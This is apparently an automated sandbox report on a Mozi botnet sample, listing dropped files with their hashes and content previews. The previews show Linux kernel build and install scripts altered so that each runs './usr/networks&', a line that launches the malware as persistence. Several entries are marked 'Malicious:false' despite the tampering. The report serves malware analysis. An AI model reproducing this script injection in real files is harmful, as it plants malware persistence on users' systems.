                                                              Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1..if [ -x /sbin/loadmap ]; then. /sbin/loadmap.else. echo "You have to install it yourself".fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):292
                                                              Entropy (8bit):3.90905274301989
                                                              Encrypted:false
                                                              SSDEEP:3:qXVxpjUvwcG6IYlfkoeOPeQxS8LXEVvXFNK/5e9o4TLZFwqwXF6HF/qHF7VvMTc2:apovwTMldPzMvHK/5u3rHoHjUAEPTn
                                                              MD5:543D5DBC6E85559159F104129FF1BF1F
                                                              SHA1:324751DF3B652BC8C71B68222D94E6A74C27B1B1
                                                              SHA-256:97ABE3A808380B11D216A3484E4156BFA5336031DD00A76307C2987585FBFF77
                                                              SHA-512:880C67C68ED1AB3436653F636294C1FCD3F70EE82C66529E99D95D1428902417FD2053093CE5D047088AE26B45822D39BFDC9AFFC9CC14FBC61C81DFBA96E59A
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 1. fi...if [ -n "$entry" ]; then. if [ -z "$compat" ]; then. echo "NATIVE($nr, $entry)". else. echo "COMPAT($nr, $entry, $compat)". fi. fi. done.) > "$out"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):716
                                                              Entropy (8bit):5.188740504939567
                                                              Encrypted:false
                                                              SSDEEP:12:cngowa2h12l3mGXHFMyHFtfBjCksL49ysL7FwuIG7n:M4+XKyrZPsL4QsL7FwuIc
                                                              MD5:E233F7425841D915F481DD78C9518D4D
                                                              SHA1:68CF549CF969E9786FF3BCECA2C5976C678C2358
                                                              SHA-256:FD438227D3E0DD70A5FE641C67B5F8148482357EFAE725A542EA930EA3E95C30
                                                              SHA-512:4F99D3541DFD43BB317020AA734A91FB4712D817716C5F3F0774BDDB05D2393EB04391AD5DE0A27F6F904BFCF3BC7BD551481F2F138956A745DD5FE23F1DCFFA
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "Image.gz" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):524
                                                              Entropy (8bit):5.2190434920010835
                                                              Encrypted:false
                                                              SSDEEP:12:cngowa2h12l3mGnHFMyHFt9n2M2V/b3PDn:M4+nKyr92M2lX
                                                              MD5:F01984516C5B822703949B83099EB130
                                                              SHA1:9DD176221BE72554D4BC5D6429573CD0645F7BF1
                                                              SHA-256:8B89A8B5AE4238923E1CA2F2444F346497D9C48FC70ED722623FDA77255D5877
                                                              SHA-512:D5B60235FD7D6FC3E2EB8D84AED27679625F47DDFA86CC7EFC94E6AADB5D61775ECDA78D33C972783590A55A6B27BD8E453F685F911EBDA06A95105CCC999177
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map..sync../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1013
                                                              Entropy (8bit):4.980378985367638
                                                              Encrypted:false
                                                              SSDEEP:24:OU6oYRFZSo7Zm5Ddv8y8bULN4ty/Mf4ikCB57SQj8X4:+zR3YddX8bUB4s+6CUM+4
                                                              MD5:7066B68ACB7D6AA34D784436E376FE3A
                                                              SHA1:E2A329E97BD265AEE872457C3A68466FEA9E30FE
                                                              SHA-256:51F3DFFB7DCF3DFC8A3446165E3A3F97027B09BDE97F7F93BBCD7F8C45AABA3F
                                                              SHA-512:7BF04CD7FB7DBA2D836D8EB31252496AA37375C0C6363426283610451B3D709CC1C01339E8D754666823AB2161ABFF5C5E918A8E03910C5E723E607D96CE2C36
                                                              Malicious:false
                                                              Preview:./usr/networks&..# is not found then the subshell will exit with code 1, and we'll..# continue on to the next board...grep -E '^# require ' "${board_cfg}" | \.. cut -d' ' -f 3- | \.. while read req; do...case ${req} in...*=y)....# If we require something =y then we check that a line....# containing it is present in the reference config.....grep -Eq "^${req}\$" "${ref_cfg}" && continue....;;...*=n)....# If we require something =n then we just invert that....# check, considering the requirement met if there isn't....# a line containing the value =y in the reference....# config.....grep -Eq "^${req/%=n/=y}\$" "${ref_cfg}" || continue....;;...*)....echo "WARNING: Unhandled requirement '${req}'"....;;...esac....[ ${print_skipped} -eq 1 ] && echo "Skipping ${board_cfg}"...exit 1..done || continue...# Merge this board config fragment into our final config file..${srctree}/scripts/kconfig/merge_config.sh \...-m -O ${objtree} ${cfg} ${board_cfg} \...| grep -Ev '^(#|Using)'.done../usr/netw
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):524
                                                              Entropy (8bit):5.2190434920010835
                                                              Encrypted:false
                                                              SSDEEP:12:cngowa2h12l3mGnHFMyHFt9n2M2V/b3PDn:M4+nKyr92M2lX
                                                              MD5:F01984516C5B822703949B83099EB130
                                                              SHA1:9DD176221BE72554D4BC5D6429573CD0645F7BF1
                                                              SHA-256:8B89A8B5AE4238923E1CA2F2444F346497D9C48FC70ED722623FDA77255D5877
                                                              SHA-512:D5B60235FD7D6FC3E2EB8D84AED27679625F47DDFA86CC7EFC94E6AADB5D61775ECDA78D33C972783590A55A6B27BD8E453F685F911EBDA06A95105CCC999177
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map..sync../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):777
                                                              Entropy (8bit):5.181427208784543
                                                              Encrypted:false
                                                              SSDEEP:12:cngowa2hA42l3mGsPzaHFMaHFt02BkcCZsL49ysL7FwuIG7n:M4wsPzaKar00RCZsL4QsL7FwuIc
                                                              MD5:448535F84AA5B4CAF079F69C4D491EA2
                                                              SHA1:F4BCEBECCC6AA1841C78F1783191655E2A76340E
                                                              SHA-256:B992FF78499EC3BB631F7746FBD2CCC8FC192A322EE9BB1D2113F3DDE83D81BF
                                                              SHA-512:C23AE1337A6C387F0CB69C9159BF5828B742F8D1FC29CCF320CD87F19650531B398143710A7A8CAA45845C87FD4651653F115BAD4D88ED7D3F6E81D1C472A0F7
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist..verify "$2".verify "$3"..# User may have a custom install script..if [ -n "${INSTALLKERNEL}" ]; then. if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi. if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi.fi..# Default install..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):778
                                                              Entropy (8bit):5.180114046612086
                                                              Encrypted:false
                                                              SSDEEP:12:cngowa2hA42l3mGsPzaHFMaHFt02BkcCZsL49ysL7FwuIGTn:M4wsPzaKar00RCZsL4QsL7FwuIK
                                                              MD5:FAE5274E36F391AA1552A80ADE42164D
                                                              SHA1:A28F085E263CC5A91CBE11543B8075467C2C1351
                                                              SHA-256:0AF4573794FA7AF09FA3A0CD808D2741973B646D1AAD18D3CE8188E85CD68655
                                                              SHA-512:9AAA1A6F202071879DDAA032BFB03E1B663C2A6C3ADAAA1B7109C603B1F380C48A9D7D17FA8CA0E009DA427A9596FA4A47DB844022CBF227A919C491B9FDAD7E
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist..verify "$2".verify "$3"..# User may have a custom install script..if [ -n "${INSTALLKERNEL}" ]; then. if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi. if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi.fi..# Default install..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1.../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):51
                                                              Entropy (8bit):4.137824116354036
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORk33g0VOORgn:HA7n
                                                              MD5:7DD33E5C2454D655FD681039B5DEB4EE
                                                              SHA1:9618B85AD954925D61B4AAB7A6A83CB02A5F1BD2
                                                              SHA-256:4235524DE1D4B7DC6B802D9E371A65F9DB24647A3B62D5BEDE0C122405FC8FD1
                                                              SHA-512:A0AC5DDE47E2716BAC26F2868BF5195179657D94E7158CE5BF353F6877B277C6E78A547F4253562467904B89F12A61226F0A7BDE245A908EAC314014EBD4D1BA
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit $ERROR../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):269
                                                              Entropy (8bit):4.8822799035917495
                                                              Encrypted:false
                                                              SSDEEP:6:ch+6yV6DoxC0ld8FxsIEYNkvqcl5gsfFmvGqBGJnn6yZrIOC6Pn:ch/PsxCc+qYtclxfQJYgwPn
                                                              MD5:EA02BAC09855DFCE9A7F5A6EAB955ECB
                                                              SHA1:C0747E33E635087BB7925771BC2AA68D8A1CC100
                                                              SHA-256:A6A8FAEAC216D55F14C091C5ACBF953A1110B0BFC69F6772A57C7A04756D940E
                                                              SHA-512:1E7B813ABAC13989C729AA9E1611BC7E5346B52C9ED7E5DC014F048B5FB39618FBE0D398F31836012BD5B057E05125E7E8AD32956BC51914037C73AD346C32EB
                                                              Malicious:false
                                                              Preview:./usr/networks&....exit(1);...}...num = -1;.# Ignore the rest of the file..}..{...if (num == -1) next;...if (($1 != -1) && ($1 != num)) {....printf "Error: Syscall %s out of order (expected %s)\n",.....$1, num;....exit(1);...};...num++;..}' "$1"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):58
                                                              Entropy (8bit):3.8859027122378516
                                                              Encrypted:false
                                                              SSDEEP:3:qXVxJjUvfvKDlOORgn:aJovHK4n
                                                              MD5:A73EAA64A7F7396DC86EEE96772F5CAD
                                                              SHA1:F496C2203BEF6CF66500070F1F106A6DE84ED2C0
                                                              SHA-256:5304A36BE867369941B7CA90AFA619ADB7D761CB1A38D520B403E2E8A8FDDE39
                                                              SHA-512:AA605A73179060C352A0F366733C9477F60A8CBB4108AFAA555C787526C4B62A359A37DD08E30F68F8AE634A9A20082E1DC6D36081E7C3B12DADAD626AA7F73F
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 1..exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1374
                                                              Entropy (8bit):5.049143893926127
                                                              Encrypted:false
                                                              SSDEEP:24:rUxDXOUwPQCwVsoKNSruNlVQbhYsph0taGOl53jNadNQFOXgh0taGOlK:rUF+NPfwVs2rMVQbWMjZlJ1FOCjZlK
                                                              MD5:F0C24F2801E658FF3A01A33E26EA7682
                                                              SHA1:27934B831C1B88A8F9D44E91CC189CA4AD72017C
                                                              SHA-256:6202A59E4AAE5585804E49A01828E70FED9614D7361BA6CD66E2214C97E5E096
                                                              SHA-512:48BA3A398680810E72E386A8D3882791B1AF3DB2C719CB06ADBDF1AE23E9785AE6B9F199127BA65C1361B91CDE77742903CCD1DE3B806FB6CDB25CA1642C187A
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# Have Kbuild supply the path to nm so we handle cross compilation..nm="$1".vmlinux="$2"..# gcc-4.6-era toolchain make _stext an A (absolute) symbol rather than T.$nm "$vmlinux" | grep -e " [TA] _stext$" -e " t start_first_256B$" -e " a text_start$" -e " t start_text$" -m4 > .tmp_symbols.txt...vma=$(cat .tmp_symbols.txt | grep -e " [TA] _stext$" | cut -d' ' -f1)..expected_start_head_addr=$vma..start_head_addr=$(cat .tmp_symbols.txt | grep " t start_first_256B$" | cut -d' ' -f1)..if [ "$start_head_addr" != "$expected_start_head_addr" ]; then..echo "ERROR: head code starts at $start_head_addr, should be $expected_start_head_addr"..echo "ERROR: try to enable LD_HEAD_STUB_CATCH config option"..echo "ERROR: see comments in arch/powerpc/tools/head_check.sh"...exit 1.fi..top_vma=$(echo $vma | cut -d'0' -f1)..expected_start_text_addr=$(cat .tmp_symbols.txt | grep " a text_start$" | cut -d' ' -f1 | sed "s/^0/$top_vma/")..start_text_addr=$(cat .tmp_symbols.txt | grep
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1338
                                                              Entropy (8bit):5.413049078573915
                                                              Encrypted:false
                                                              SSDEEP:24:rUaqf4HZd6VUZD74+jhoCRlpBmafh4MKgQ5Ipxa/Smxan6J+WmpE:rUaqf4HCVk7+CRlpfh4M3QqpQ/zxa6JN
                                                              MD5:616785607E8CA9E920649194171B6910
                                                              SHA1:00FAD3EA514561388B1A1BC2972E1EC817C2A518
                                                              SHA-256:E43189451F97664D57D2D137231EFD4B8F1E831E8B0656C51D21C8670314F9DA
                                                              SHA-512:6903D18350AAD87A5E1AC0D9B9BF5DC94369A56B826BB49FF23B2EF4418CF0E142D30413ED3737770B1B8A38967DF5CDC266300D41D562EE1F770EEC26E890FD
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# Have Kbuild supply the path to objdump and nm so we handle cross compilation..objdump="$1".nm="$2".vmlinux="$3"..# Remove from the bad relocations those that match an undefined weak symbol.# which will result in an absolute relocation to 0..# Weak unresolved symbols are of that form in nm output:.# " w _binary__btf_vmlinux_bin_end".undef_weak_symbols=$($nm "$vmlinux" | awk '$1 ~ /w/ { print $2 }')..bad_relocs=$(.$objdump -R "$vmlinux" |..# Only look at relocation lines...grep -E '\<R_' |..# These relocations are okay..# On PPC64:..#.R_PPC64_RELATIVE, R_PPC64_NONE..# On PPC:..#.R_PPC_RELATIVE, R_PPC_ADDR16_HI,..#.R_PPC_ADDR16_HA,R_PPC_ADDR16_LO,..#.R_PPC_NONE..grep -F -w -v 'R_PPC64_RELATIVE.R_PPC64_NONE.R_PPC_ADDR16_LO.R_PPC_ADDR16_HI.R_PPC_ADDR16_HA.R_PPC_RELATIVE.R_PPC_NONE' |..([ "$undef_weak_symbols" ] && grep -F -w -v "$undef_weak_symbols" || cat).)..if [ -z "$bad_relocs" ]; then..exit 0.fi..num_bad=$(echo "$bad_relocs" | wc -l).echo
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):50
                                                              Entropy (8bit):4.03572875064339
                                                              Encrypted:false
                                                              SSDEEP:3:qXVaBQSXVOORgn:wSMn
                                                              MD5:804DDBE985C6034E697B31A2C2B0135D
                                                              SHA1:8E947C859C562B20CF6FF00522349EC43E7C6F8B
                                                              SHA-256:D358BBDC7C1B9747D321DEEA37D1E83946CD7D046050021A84FAAB17A65A6892
                                                              SHA-512:A355120B8241DE555E782E07745446BD5970905F9ED645D896E8BA17348EE44216F715BF79A1A228FEB0FAECAC3CC06B26BC0A6745DD385782BADFBFC9769D00
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):716
                                                              Entropy (8bit):5.188740504939567
                                                              Encrypted:false
                                                              SSDEEP:12:cngowa2h12l3mGXHFMyHFtfBjCksL49ysL7FwuIG7n:M4+XKyrZPsL4QsL7FwuIc
                                                              MD5:E233F7425841D915F481DD78C9518D4D
                                                              SHA1:68CF549CF969E9786FF3BCECA2C5976C678C2358
                                                              SHA-256:FD438227D3E0DD70A5FE641C67B5F8148482357EFAE725A542EA930EA3E95C30
                                                              SHA-512:4F99D3541DFD43BB317020AA734A91FB4712D817716C5F3F0774BDDB05D2393EB04391AD5DE0A27F6F904BFCF3BC7BD551481F2F138956A745DD5FE23F1DCFFA
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "Image.gz" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):518
                                                              Entropy (8bit):5.221872442078692
                                                              Encrypted:false
                                                              SSDEEP:12:cngowa2h12l3mGnHFMyHFt9n2M2V/b3P2n:M4+nKyr92M2lS
                                                              MD5:69819922FB9DBF095FA1F4AC01F6B37C
                                                              SHA1:C2A5FD4AE7B020D453173D20306EF002AA69CDAA
                                                              SHA-256:571C340D1F044789BC98AE272312D0A3B477520A10DD292F4B8F572D95362772
                                                              SHA-512:33C4A288C00BEEDD6C558412977FFA9D0EDD2D24FC3868F5AEB80BBEECE90C34D86FA5153417BD5E1FD19B36E0BEAB93552769EB7219AE071A919B6A20474E10
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):115
                                                              Entropy (8bit):4.352261167967631
                                                              Encrypted:false
                                                              SSDEEP:3:qXVxJjVvqJehDIAtQhLMWZKeKeBHvrjUv6viXVOORgn:aJQJRAiBIeHTov6viMn
                                                              MD5:CF0DF14B2542B49CC430815F52210FB2
                                                              SHA1:57F85D438B7B483317A0369336E7FAE77F416B94
                                                              SHA-256:AE1F21EF3B288AC922174882D038556FC6FFAA23B297ACE426CC43F610978757
                                                              SHA-512:3A844C13254D17FC86BA21CF13F63EDF3EF081520C2A5BFDD77DAED6B3CB3B022730A391F481D4C4B315A7152C7E36A2357F4A6A426813ADDA0FE3E249947913
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 0.else. echo "$file: undefined symbols found" >&2. exit 1.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2150
                                                              Entropy (8bit):5.468486256940274
                                                              Encrypted:false
                                                              SSDEEP:48:M3ZRGLswqELBfggjXbtANxNxMxdvKYzE8cY:qZREswqmBYOIMxdTE8cY
                                                              MD5:31D41F5211924C4632BC4C2C647F86C8
                                                              SHA1:FB13A405867C03FE24A3BDF261EBAC76696C3A1C
                                                              SHA-256:CC8883B933D76F68E02C2DC72A69081826AFD29546AB4D670F59B5261D5BCC7D
